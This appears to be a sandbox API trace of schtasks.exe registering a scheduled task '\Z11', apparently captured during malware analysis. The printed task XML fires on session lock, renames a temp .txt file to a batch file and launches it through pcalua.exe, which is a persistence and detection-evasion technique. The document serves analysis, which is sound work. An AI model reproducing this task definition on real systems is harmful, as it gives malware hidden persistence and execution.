[0221.849] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr="\r\n\r\n \r\n 2024-01-02T21:08:22\r\n \\Z11\r\n \r\n \r\n \r\n true\r\n SessionLock\r\n kEecfMwgj\r\n \r\n \r\n \r\n \r\nInteractiveToken \r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n true\r\n true\r\n false\r\n false\r\n \r\n false\r\n false\r\n \r\n true\r\n true\r\n true\r\n false\r\n false\r\n PT72H\r\n 7\r\n \r\n \r\n \r\n schtasks.exe\r\n /delete /tn \"\\lockw\" /f\r\n \r\n \r\n cmd.exe\r\n /c \"copy /y \"%temp%\\check01.txt\" \"%temp%\\check01.bat\" & timeout 1\"\r\n \r\n \r\n pcalua.exe\r\n -a \"%temp%\\check01.bat\"\r\n \r\n \r\n\r\n", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 1789
[0221.849] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr="\r\n\r\n \r\n 2024-01-02T21:08:22\r\n \\Z11\r\n \r\n \r\n \r\n true\r\n SessionLock\r\n kEecfMwgj\r\n \r\n \r\n \r\n \r\nInteractiveToken \r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n true\r\n true\r\n false\r\n false\r\n \r\n false\r\n false\r\n \r\n true\r\n true\r\n true\r\n false\r\n false\r\n PT72H\r\n 7\r\n \r\n \r\n \r\n schtasks.exe\r\n /delete /tn \"\\lockw\" /f\r\n \r\n \r\n cmd.exe\r\n /c \"copy /y \"%temp%\\check01.txt\" \"%temp%\\check01.bat\" & timeout 1\"\r\n \r\n \r\n pcalua.exe\r\n -a \"%temp%\\check01.bat\"\r\n \r\n \r\n\r\n", cbMultiByte=-1, lpWideCharStr=0x306038, cchWideChar=1789 | out: lpWideCharStr="\r\n\r\n \r\n 2024-01-02T21:08:22\r\n \\Z11\r\n \r\n \r\n \r\n true\r\n SessionLock\r\n kEecfMwgj\r\n \r\n \r\n \r\n \r\nInteractiveToken \r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n true\r\n true\r\n false\r\n false\r\n \r\n false\r\n false\r\n \r\n true\r\n true\r\n true\r\n false\r\n false\r\n PT72H\r\n 7\r\n \r\n \r\n \r\n schtasks.exe\r\n /delete /tn \"\\lockw\" /f\r\n \r\n \r\n cmd.exe\r\n /c \"copy /y \"%temp%\\check01.txt\" \"%temp%\\check01.bat\" & timeout 1\"\r\n \r\n \r\n pcalua.exe\r\n -a \"%temp%\\check01.bat\"\r\n \r\n \r\n\r\n") returned 1789
[0221.849] SysStringLen (param_1="\r\n\r\n \r\n 2024-01-02T21:08:22\r\n \\Z11\r\n \r\n \r\n \r\n true\r\n SessionLock\r\n kEecfMwgj\r\n \r\n \r\n \r\n \r\nInteractiveToken \r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n true\r\n true\r\n false\r\n false\r\n \r\n false\r\n false\r\n \r\n true\r\n true\r\n true\r\n false\r\n false\r\n PT72H\r\n 7\r\n \r\n \r\n \r\n schtasks.exe\r\n /delete /tn \"\\lockw\" /f\r\n \r\n \r\n cmd.exe\r\n /c \"copy /y \"%temp%\\check01.txt\" \"%temp%\\check01.bat\" & timeout 1\"\r\n \r\n \r\n pcalua.exe\r\n -a \"%temp%\\check01.bat\"\r\n \r\n \r\n\r\n") returned 0x6fc
[0221.849] VarBstrCat (in: bstrLeft=0x0, bstrRight="\r\n\r\n \r\n 2024-01-02T21:08:22\r\n \\Z11\r\n \r\n \r\n \r\n true\r\n SessionLock\r\n kEecfMwgj\r\n \r\n \r\n \r\n \r\nInteractiveToken \r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n true\r\n true\r\n false\r\n false\r\n \r\n false\r\n false\r\n \r\n true\r\n true\r\n true\r\n false\r\n false\r\n PT72H\r\n 7\r\n \r\n \r\n \r\n schtasks.exe\r\n /delete /tn \"\\lockw\" /f\r\n \r\n \r\n cmd.exe\r\n /c \"copy /y \"%temp%\\check01.txt\" \"%temp%\\check01.bat\" & timeout 1\"\r\n \r\n \r\n pcalua.exe\r\n -a \"%temp%\\check01.bat\"\r\n \r\n \r\n\r\n", pbstrResult=0x18c3c8 | out: pbstrResult=0x18c3c8) returned 0x0
[0221.947] free (_Block=0xd5fd0)
[0221.947] CloseHandle (hObject=0xf4) returned 1
[0221.949] lstrlenW (lpString="") returned 0
[0221.949] malloc (_Size=0x18) returned 0x19dfa0
[0221.949] SysStringLen (param_1="") returned 0x0
[0221.949] free (_Block=0x19dfa0)
[0221.949] lstrlenW (lpString="") returned 0
[0221.950] ITaskFolder:RegisterTask (in: This=0xd5b20, Path="\\Z11", XmlText="\r\n\r\n \r\n 2024-01-02T21:08:22\r\n \\Z11\r\n \r\n \r\n \r\n true\r\n SessionLock\r\n kEecfMwgj\r\n \r\n \r\n \r\n \r\nInteractiveToken \r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n true\r\n true\r\n false\r\n false\r\n \r\n false\r\n false\r\n \r\n true\r\n true\r\n true\r\n false\r\n false\r\n PT72H\r\n 7\r\n \r\n \r\n \r\n schtasks.exe\r\n /delete /tn \"\\lockw\" /f\r\n \r\n \r\n cmd.exe\r\n /c \"copy /y \"%temp%\\check01.txt\" \"%temp%\\check01.bat\" & timeout 1\"\r\n \r\n \r\n pcalua.exe\r\n -a \"%temp%\\check01.bat\"\r\n \r\n \r\n\r\n", flags=6, UserId=0x18c510*(varType=0x8, wReserved1=0xd, wReserved2=0x0, wReserved3=0x0, varVal1="", varVal2=0x1c), password=0x18c530*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xd0230, varVal2=0xd0230), LogonType=0, sddl=0x18c4f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x10, varVal2=0x2fa490), ppTask=0x18c478 | out: ppTask=0x18c478*=0xd7d80) returned 0x0
[0222.815] GetProcessHeap () returned 0x2d0000
[0222.815] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x20) returned 0x303b50
[0222.815] _memicmp (_Buf1=0x2ebc20, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0222.815] LoadStringW (in: hInstance=0x0, uID=0x12e, lpBuffer=0x2ed430, cchBufferMax=256 | out: lpBuffer="SUCCESS: The scheduled task \"%s\" has successfully been created.\n") returned 0x40
[0222.819] lstrlenW (lpString="SUCCESS: The scheduled task \"%s\" has successfully been created.\n") returned 64
[0222.819] GetProcessHeap () returned 0x2d0000
[0222.819] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x82) returned 0x307c70
[0222.820] _vsnwprintf (in: _Buffer=0x18c750, _BufferCount=0x1fb, _Format="SUCCESS: The scheduled task \"%s\" has successfully been created.\n", _ArgList=0x18c438 | out: _Buffer="SUCCESS: The scheduled task \"\\Z11\" has successfully been created.\n") returned 66
[0222.820] _fileno (_File=0x7feff862ab0) returned 1
[0222.820] _errno () returned 0xd4bb0
[0222.820] _get_osfhandle (_FileHandle=1) returned 0x7
[0222.820] _errno () returned 0xd4bb0
[0222.820] GetFileType (hFile=0x7) returned 0x2
[0222.823] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0222.823] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x18c3b0 | out: lpMode=0x18c3b0) returned 1
[0222.824] __iob_func () returned 0x7feff862a80
[0222.824] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0222.824] lstrlenW (lpString="SUCCESS: The scheduled task \"\\Z11\" has successfully been created.\n") returned 66
[0222.824] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x18c750*, nNumberOfCharsToWrite=0x42, lpNumberOfCharsWritten=0x18c420, lpReserved=0x0 | out: lpBuffer=0x18c750*, lpNumberOfCharsWritten=0x18c420*=0x42) returned 1
[0222.828] IUnknown:Release (This=0xd7d80) returned 0x0
[0222.829] TaskScheduler:IUnknown:Release (This=0xd5b20) returned 0x0
[0222.829] TaskScheduler:IUnknown:Release (This=0xd5a70) returned 0x1
[0222.829] lstrlenW (lpString="") returned 0
[0222.829] lstrlenW (lpString="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\Z11.xml") returned 44
[0222.829] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\Z11.xml", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45
[0222.829] GetProcessHeap () returned 0x2d0000
[0222.829] GetProcessHeap () returned 0x2d0000
[0222.829] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ec4f0) returned 1
[0222.830] GetProcessHeap () returned 0x2d0000
[0222.830] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2ec4f0) returned 0x1fc
[0222.830] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ec4f0 | out: hHeap=0x2d0000) returned 1
[0222.830] GetProcessHeap () returned 0x2d0000
[0222.830] GetProcessHeap () returned 0x2d0000
[0222.831] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ec480) returned 1
[0222.831] GetProcessHeap () returned 0x2d0000
[0222.831] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2ec480) returned 0x5a
[0222.831] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ec480 | out: hHeap=0x2d0000) returned 1
[0222.831] GetProcessHeap () returned 0x2d0000
[0222.831] GetProcessHeap () returned 0x2d0000
[0222.831] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ed6b0) returned 1
[0222.831] GetProcessHeap () returned 0x2d0000
[0222.831] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2ed6b0) returned 0x16
[0222.832] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ed6b0 | out: hHeap=0x2d0000) returned 1
[0222.832] GetProcessHeap () returned 0x2d0000
[0222.832] GetProcessHeap () returned 0x2d0000
[0222.832] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ed690) returned 1
[0222.832] GetProcessHeap () returned 0x2d0000
[0222.832] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2ed690) returned 0x18
[0222.832] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ed690 | out: hHeap=0x2d0000) returned 1
[0222.832] GetProcessHeap () returned 0x2d0000
[0222.832] GetProcessHeap () returned 0x2d0000
[0222.832] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ece40) returned 1
[0222.834] GetProcessHeap () returned 0x2d0000
[0222.834] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2ece40) returned 0x20
[0222.835] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ece40 | out: hHeap=0x2d0000) returned 1
[0222.835] GetProcessHeap () returned 0x2d0000
[0222.835] GetProcessHeap () returned 0x2d0000
[0222.835] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ec180) returned 1
[0222.835] GetProcessHeap () returned 0x2d0000
[0222.835] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2ec180) returned 0xa0
[0222.836] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ec180 | out: hHeap=0x2d0000) returned 1
[0222.836] GetProcessHeap () returned 0x2d0000
[0222.836] GetProcessHeap () returned 0x2d0000
[0222.836] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ebc00) returned 1
[0222.836] GetProcessHeap () returned 0x2d0000
[0222.836] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2ebc00) returned 0x18
[0222.837] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ebc00 | out: hHeap=0x2d0000) returned 1
[0222.837] GetProcessHeap () returned 0x2d0000
[0222.837] GetProcessHeap () returned 0x2d0000
[0222.837] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2eccc0) returned 1
[0222.837] GetProcessHeap () returned 0x2d0000
[0222.837] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2eccc0) returned 0x20
[0222.838] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2eccc0 | out: hHeap=0x2d0000) returned 1
[0222.838] GetProcessHeap () returned 0x2d0000
[0222.838] GetProcessHeap () returned 0x2d0000
[0222.838] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ede40) returned 1
[0222.838] GetProcessHeap () returned 0x2d0000
[0222.838] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2ede40) returned 0x5e
[0222.839] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ede40 | out: hHeap=0x2d0000) returned 1
[0222.839] GetProcessHeap () returned 0x2d0000
[0222.839] GetProcessHeap () returned 0x2d0000
[0222.839] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ed670) returned 1
[0222.839] GetProcessHeap () returned 0x2d0000
[0222.839] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2ed670) returned 0x18
[0222.839] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ed670 | out: hHeap=0x2d0000) returned 1
[0222.839] GetProcessHeap () returned 0x2d0000
[0222.839] GetProcessHeap () returned 0x2d0000
[0222.839] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ecc60) returned 1
[0222.839] GetProcessHeap () returned 0x2d0000
[0222.840] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2ecc60) returned 0x20
[0222.840] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ecc60 | out: hHeap=0x2d0000) returned 1
[0222.840] GetProcessHeap () returned 0x2d0000
[0222.840] GetProcessHeap () returned 0x2d0000
[0222.841] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ec460) returned 1
[0222.841] GetProcessHeap () returned 0x2d0000
[0222.841] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2ec460) returned 0xc
[0222.841] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ec460 | out: hHeap=0x2d0000) returned 1
[0222.841] GetProcessHeap () returned 0x2d0000
[0222.841] GetProcessHeap () returned 0x2d0000
[0222.841] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ec440) returned 1
[0222.841] GetProcessHeap () returned 0x2d0000
[0222.841] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2ec440) returned 0x18
[0222.841] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ec440 | out: hHeap=0x2d0000) returned 1
[0222.841] GetProcessHeap () returned 0x2d0000
[0222.841] GetProcessHeap () returned 0x2d0000
[0222.841] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5ed0) returned 1
[0222.842] GetProcessHeap () returned 0x2d0000
[0222.842] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2e5ed0) returned 0x20
[0222.842] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5ed0 | out: hHeap=0x2d0000) returned 1
[0222.842] GetProcessHeap () returned 0x2d0000
[0222.842] GetProcessHeap () returned 0x2d0000
[0222.843] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ebd80) returned 1
[0222.843] GetProcessHeap () returned 0x2d0000
[0222.843] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2ebd80) returned 0x208
[0222.843] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ebd80 | out: hHeap=0x2d0000) returned 1
[0222.843] GetProcessHeap () returned 0x2d0000
[0222.844] GetProcessHeap () returned 0x2d0000
[0222.844] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ebbe0) returned 1
[0222.844] GetProcessHeap () returned 0x2d0000
[0222.844] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2ebbe0) returned 0x18
[0222.844] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ebbe0 | out: hHeap=0x2d0000) returned 1
[0222.844] GetProcessHeap () returned 0x2d0000
[0222.844] GetProcessHeap () returned 0x2d0000
[0222.844] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5de0) returned 1
[0222.844] GetProcessHeap () returned 0x2d0000
[0222.844] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2e5de0) returned 0x20
[0222.845] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5de0 | out: hHeap=0x2d0000) returned 1
[0222.845] GetProcessHeap () returned 0x2d0000
[0222.845] GetProcessHeap () returned 0x2d0000
[0222.845] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ed430) returned 1
[0222.845] GetProcessHeap () returned 0x2d0000
[0222.845] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2ed430) returned 0x200
[0222.846] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ed430 | out: hHeap=0x2d0000) returned 1
[0222.846] GetProcessHeap () returned 0x2d0000
[0222.846] GetProcessHeap () returned 0x2d0000
[0222.846] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ebc20) returned 1
[0222.846] GetProcessHeap () returned 0x2d0000
[0222.846] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2ebc20) returned 0x18
[0222.847] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ebc20 | out: hHeap=0x2d0000) returned 1
[0222.847] GetProcessHeap () returned 0x2d0000
[0222.847] GetProcessHeap () returned 0x2d0000
[0222.847] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5d50) returned 1
[0222.847] GetProcessHeap () returned 0x2d0000
[0222.847] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2e5d50) returned 0x20
[0222.848] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5d50 | out: hHeap=0x2d0000) returned 1
[0222.848] GetProcessHeap () returned 0x2d0000
[0222.848] GetProcessHeap () returned 0x2d0000
[0222.848] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ec390) returned 1
[0222.922] GetProcessHeap () returned 0x2d0000
[0222.923] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2ec390) returned 0x14
[0222.923] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ec390 | out: hHeap=0x2d0000) returned 1
[0222.923] GetProcessHeap () returned 0x2d0000
[0222.923] GetProcessHeap () returned 0x2d0000
[0222.923] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ec370) returned 1
[0222.923] GetProcessHeap () returned 0x2d0000
[0222.923] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2ec370) returned 0x18
[0222.923] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ec370 | out: hHeap=0x2d0000) returned 1
[0222.923] GetProcessHeap () returned 0x2d0000
[0222.923] GetProcessHeap () returned 0x2d0000
[0222.923] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5c90) returned 1
[0222.923] GetProcessHeap () returned 0x2d0000
[0222.924] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2e5c90) returned 0x20
[0222.924] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5c90 | out: hHeap=0x2d0000) returned 1
[0222.925] GetProcessHeap () returned 0x2d0000
[0222.925] GetProcessHeap () returned 0x2d0000
[0222.925] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ec3b0) returned 1
[0222.925] GetProcessHeap () returned 0x2d0000
[0222.925] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2ec3b0) returned 0x16
[0222.925] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ec3b0 | out: hHeap=0x2d0000) returned 1
[0222.925] GetProcessHeap () returned 0x2d0000
[0222.925] GetProcessHeap () returned 0x2d0000
[0222.925] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ec230) returned 1
[0222.925] GetProcessHeap () returned 0x2d0000
[0222.925] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2ec230) returned 0x18
[0222.925] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ec230 | out: hHeap=0x2d0000) returned 1
[0222.926] GetProcessHeap () returned 0x2d0000
[0222.926] GetProcessHeap () returned 0x2d0000
[0222.926] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5c60) returned 1
[0222.926] GetProcessHeap () returned 0x2d0000
[0222.926] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2e5c60) returned 0x20
[0222.927] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5c60 | out: hHeap=0x2d0000) returned 1
[0222.927] GetProcessHeap () returned 0x2d0000
[0222.927] GetProcessHeap () returned 0x2d0000
[0222.928] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ebb60) returned 1
[0222.928] GetProcessHeap () returned 0x2d0000
[0222.928] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2ebb60) returned 0x2
[0222.928] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ebb60 | out: hHeap=0x2d0000) returned 1
[0222.928] GetProcessHeap () returned 0x2d0000
[0222.928] GetProcessHeap () returned 0x2d0000
[0222.928] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5ab0) returned 1
[0222.928] GetProcessHeap () returned 0x2d0000
[0222.928] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2e5ab0) returned 0x20
[0222.929] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5ab0 | out: hHeap=0x2d0000) returned 1
[0222.929] GetProcessHeap () returned 0x2d0000
[0222.929] GetProcessHeap () returned 0x2d0000
[0222.929] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5ae0) returned 1
[0222.929] GetProcessHeap () returned 0x2d0000
[0222.929] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2e5ae0) returned 0x20
[0222.930] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5ae0 | out: hHeap=0x2d0000) returned 1
[0222.930] GetProcessHeap () returned 0x2d0000
[0222.930] GetProcessHeap () returned 0x2d0000
[0222.930] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5b10) returned 1
[0222.930] GetProcessHeap () returned 0x2d0000
[0222.930] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2e5b10) returned 0x20
[0222.931] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5b10 | out: hHeap=0x2d0000) returned 1
[0222.931] GetProcessHeap () returned 0x2d0000
[0222.931] GetProcessHeap () returned 0x2d0000
[0222.931] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5b40) returned 1
[0222.931] GetProcessHeap () returned 0x2d0000
[0222.931] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2e5b40) returned 0x20
[0222.932] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5b40 | out: hHeap=0x2d0000) returned 1
[0222.932] GetProcessHeap () returned 0x2d0000
[0222.932] GetProcessHeap () returned 0x2d0000
[0222.932] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2eccf0) returned 1
[0222.932] GetProcessHeap () returned 0x2d0000
[0222.932] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2eccf0) returned 0x20
[0222.933] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2eccf0 | out: hHeap=0x2d0000) returned 1
[0222.933] GetProcessHeap () returned 0x2d0000
[0222.933] GetProcessHeap () returned 0x2d0000
[0222.933] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ecd20) returned 1
[0222.933] GetProcessHeap () returned 0x2d0000
[0222.933] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2ecd20) returned 0x20
[0222.934] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ecd20 | out: hHeap=0x2d0000) returned 1
[0222.934] GetProcessHeap () returned 0x2d0000
[0222.934] GetProcessHeap () returned 0x2d0000
[0222.934] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e7d40) returned 1
[0222.934] GetProcessHeap () returned 0x2d0000
[0222.934] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2e7d40) returned 0x30
[0222.935] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e7d40 | out: hHeap=0x2d0000) returned 1
[0222.935] GetProcessHeap () returned 0x2d0000
[0222.935] GetProcessHeap () returned 0x2d0000
[0222.935] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ecd50) returned 1
[0222.935] GetProcessHeap () returned 0x2d0000
[0222.935] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2ecd50) returned 0x20
[0222.936] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ecd50 | out: hHeap=0x2d0000) returned 1
[0222.936] GetProcessHeap () returned 0x2d0000
[0222.936] GetProcessHeap () returned 0x2d0000
[0222.936] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e7d80) returned 1
[0222.936] GetProcessHeap () returned 0x2d0000
[0222.936] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2e7d80) returned 0x30
[0222.937] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e7d80 | out: hHeap=0x2d0000) returned 1
[0222.937] GetProcessHeap () returned 0x2d0000
[0222.937] GetProcessHeap () returned 0x2d0000
[0222.937] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ece10) returned 1
[0222.937] GetProcessHeap () returned 0x2d0000
[0222.937] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2ece10) returned 0x20
[0222.937] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ece10 | out: hHeap=0x2d0000) returned 1
[0222.938] GetProcessHeap () returned 0x2d0000
[0222.938] GetProcessHeap () returned 0x2d0000
[0222.938] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x307c70) returned 1
[0222.938] GetProcessHeap () returned 0x2d0000
[0222.938] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x307c70) returned 0x82
[0222.938] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x307c70 | out: hHeap=0x2d0000) returned 1
[0222.938] GetProcessHeap () returned 0x2d0000
[0222.938] GetProcessHeap () returned 0x2d0000
[0222.938] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x303b50) returned 1
[0222.939] GetProcessHeap () returned 0x2d0000
[0222.939] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x303b50) returned 0x20
[0222.939] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x303b50 | out: hHeap=0x2d0000) returned 1
[0222.939] GetProcessHeap () returned 0x2d0000
[0222.939] GetProcessHeap () returned 0x2d0000
[0222.939] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ebb80) returned 1
[0222.939] GetProcessHeap () returned 0x2d0000
[0222.939] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2ebb80) returned 0x18
[0222.939] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ebb80 | out: hHeap=0x2d0000) returned 1
[0222.939] GetProcessHeap () returned 0x2d0000
[0222.939] GetProcessHeap () returned 0x2d0000
[0222.939] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5b70) returned 1
[0222.940] GetProcessHeap () returned 0x2d0000
[0222.940] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2e5b70) returned 0x20
[0222.940] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5b70 | out: hHeap=0x2d0000) returned 1
[0222.940] GetProcessHeap () returned 0x2d0000
[0222.940] GetProcessHeap () returned 0x2d0000
